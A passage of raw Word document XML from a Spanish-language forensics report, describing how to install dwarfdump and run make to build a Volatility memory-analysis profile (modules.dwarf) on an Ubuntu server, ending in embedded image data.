          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F7567F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Primero de todo instalaremos los paquetes relativos a </w:t>
      </w:r>
      <w:r w:rsidRPr="000866BC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>dwarfdump</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya que el servidor no los tiene instalado por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FEC7DE" w14:textId="02C8AD65" w:rsidR="0090249C" w:rsidRPr="00542C58" w:rsidRDefault="009B1250" w:rsidP="0090249C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seguiremos los pasos ya indicados en el </w:t>
      </w:r>
      <w:r w:rsidR="0090249C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">partado </w:t>
      </w:r>
      <w:r w:rsidR="002F18FA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">con el enlace </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="0090249C" w:rsidRPr="00612555">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=dCU6kIh0qSI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="169A893A" w14:textId="24E93C2B" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ahora, se procede a instalar dwarfdum</w:t>
      </w:r>
      <w:r w:rsidR="0090249C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, para poder hacer el modules.dwarf que </w:t>
      </w:r>
      <w:r w:rsidR="0090249C" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adelante se explica. Una vez hemos realizado la instalación procedemos a crear el perfil de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F502DF8" w14:textId="3E672640" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para ello entraremos en la carpeta </w:t>
      </w:r>
      <w:r w:rsidRPr="0090249C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0090249C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/tools/linux</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, una vez allí dentro ejecutaremos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="0090249C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Con ello, generaremos el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="0090249C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>modules.dwarf</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Se puede ver en las siguientes images como se ha generado tras ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="0090249C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A1AE3" w14:textId="0B80D169" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="00BD1378" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B2C3162" wp14:editId="030959C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2883176</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4987925" cy="1569085"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="570641244" name="Grupo 8"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4987925" cy="1569085"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4987925" cy="1569085"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1945454415" name="Grupo 6"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4987925" cy="1569085"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5040147" cy="1685925"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="695912201" name="Imagen 5" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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2465222" y="0"/>
                              <a:ext cx="2574925" cy="1685925"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1595452439" name="Imagen 4" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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7315"/>
                              <a:ext cx="2479675" cy="747395"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1971692211" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="34506" y="1017917"/>
                            <a:ext cx="2266315" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2C7FBF0F" w14:textId="6178D569" w:rsidR="00CD44B8" w:rsidRPr="00B12428" w:rsidRDefault="00CD44B8" w:rsidP="00CD44B8">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>17</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="51" w:name="_Toc155782584"/>
                              <w:r>
                                <w:t>Generando make.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2C3162" id="Grupo 8" o:spid="_x0000_s1069" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:227pt;width:392.75pt;height:123.55pt;z-index:251725824;mso-position-horizontal:center;mso-position-horizontal-relative:margin" coordsize="49879,15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5bZDgQAALsLAAAOAAAAZHJzL2Uyb0RvYy54bWzkVu1u2zYU/T9g70Bo&#10;wP41thTZsrw4hZcsQYCgNZYM/U1TlEVUIjmSjp2+zZ5hj9AX2yEl2bOdoltXYBiGIPLl9+G5597L&#10;i9fbpiZP3Fih5CyKz4YR4ZKpQsjVLPrl8ebVJCLWUVnQWkk+i565jV5ffvvNxUZPeaIqVRfcEGwi&#10;7XSjZ1HlnJ4OBpZVvKH2TGkuMVgq01CHplkNCkM32L2pB8lwOB5slCm0UYxbi97rdjC6DPuXJWfu&#10;bVla7kg9i4DNha8J36X/Di4v6HRlqK4E62DQL0DRUCFx6G6ra+ooWRtxslUjmFFWle6MqWagylIw&#10;Hu6A28TDo9vcGrXW4S6r6WaldzSB2iOevnhb9ubp1ugHvTBgYqNX4CK0/F22pWn8L1CSbaDseUcZ&#10;3zrC0JnmkyxPRhFhGItH43w4GbWksgrMn6xj1U+fWTnoDx4cwNk1WpjAvTBEFDg0T0f4S2OAkLSB&#10;xm7NWisy9jD8qn/viqNhOozTrCNnPBl5poDqE1fUgk3x37kZ1ombPx8OWOXWhkfdJs1f2qOh5v1a&#10;v4IiNXViKWrhnkN0QXselHxaCLYwbWPP/Dgf5XEC3fbE3zV0xSWBIwpuGaLsETJR33+3nf8QPte+&#10;V2gmPv4uCWZyQwtK6Nqp5uNvTjB4TzruGfKn+oPaY6mn5V6x95ZIdVVRueJzqxHb8H7g83D6wDcP&#10;MC9roW9EXXs1e7tjBwiP4ugFgtsYvVZs7dG1ScfwGkQpaSuhbUTMlDdLDi2auwJkMCQ8Bx1qI6Tz&#10;+OjUOsMdq7xZAsfPwN7qYDcQQO9x+itYRKVfcRSHSToeJUkSkdNoTEZZuo/GFwQHJo11t1w1xBtA&#10;DCTwMp3Sp3vbYeqnQKh7GMFEs/UNjP+MTONRjgSRpOf5kU7T/7NOk68vTNRXSDI7RyYOou9rRJJm&#10;+TjrakSWZuf5YRb8GqLcFwuf9PGWsH2Qo3US5n+rXD5UVHPEiN92n/ziPIvHeZLEu+x3taaFUUh9&#10;xPm0R0Jq6hb5Akvc9keFkrnr/0R8n6ej4ThQGQ/jLI+zIzaT8dhTHCpuMjmfpP+ITeQmVYuiz44+&#10;9q9qQ54oHkybSrTpGAXrYFYtfcqQyq9q85jvgQ9sl7S85bbLbVuhA0DftVTFM4gwCpkHarGa3Qgc&#10;eE+tW1CDhxc68Zh0b/Epa7WZRaqzIlIp8+Glfj8fDsZoRDZ4yM0i++ua+hJY30m43r/6esP0xrI3&#10;5Lq5UrgqvAg0wcQC4+reLI1q3uGNOfenYIhKhrNmkevNK4cWBvBGZXw+D3ZbSe/lg0b9jUN+9cQ+&#10;bt9Ro7vM60XyRvXiOknA7VxPs9VzVMgbEbLznsWObwg9WOGFCOvgCfrndpi1f3Nf/gEAAP//AwBQ&#10;SwMECgAAAAAAAAAhAH9kEn2J+QAAifkAABQAAABkcnMvbWVkaWEvaW1hZ2UxLnBuZ4lQTkcNChoK&#10;AAAADUlIRFIAAALjAAAB5AgGAAAAlJAhgQAAAAFzUkdCAK7OHOkAAAAEZ0FNQQAAsY8L/GEFAAAA&#10;CXBIWXMAAA7DAAAOwwHHb6hkAAAAYWlUWHRTbmlwTWV0YWRhdGEAAAAAAHsiY2xpcFBvaW50cyI6&#10;W3sieCI6MCwieSI6MH0seyJ4Ijo3MzksInkiOjB9LHsieCI6NzM5LCJ5Ijo0ODR9LHsieCI6MCwi&#10;eSI6NDg0fV19xwjWEAAA+LFJREFUeF7s/Qm0LEla3wlaeETce9+W7718mflyfbnvWQXUQhVULkUW&#10;RRXaW4UWxNJDaTTQczTdkmakFiPOdOkcjkT39OmRZo66oUEFB4GOWhIS0oyaKoQQVCUIqBUQEtRG&#10;VrLWXplvu0tE+Hx/M//utWvPzN3Cw2O79//L/J67m3322WeLu39h18Ojd9vXfEfZK42l5zamkOOJ&#10;JI7Gpen3e2bTjEy5e8WMt79szN41M+iPzUbRM+fPnTZ7eztmb2fXlKM9KTkxom6GlaGJKc3epDSl&#10;SK8/MP1iKGnGXBf97Z2RuXJ9WyotpMK+yEB2Zdvvm6IoxJe+mUzEguT3es5gaURXGJfqqaOvDSjH&#10;piylrlLKyXYiVrA1k7GkiYhKb7xrJvBV0ibjPdOTbTkZSV2urCRILT1b57gc7detWB1vu7e3Z/0c&#10;Dofm5MmTZmtry5ZB2kFZ1wb1v4c2g7KwbR3Lf8i3++Ox6Q8Kc+rUSbN9ddt88YtftKrOptMbi999&#10;6adS6nDoVtHjqp4EqA8c+OnapW3r9foyJjIu/Q3T29wyxfCkDJOIbE1/SwwMJV/yZGzVFsBwWH+l&#10;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&#10;fkFQgA+E+zcjqe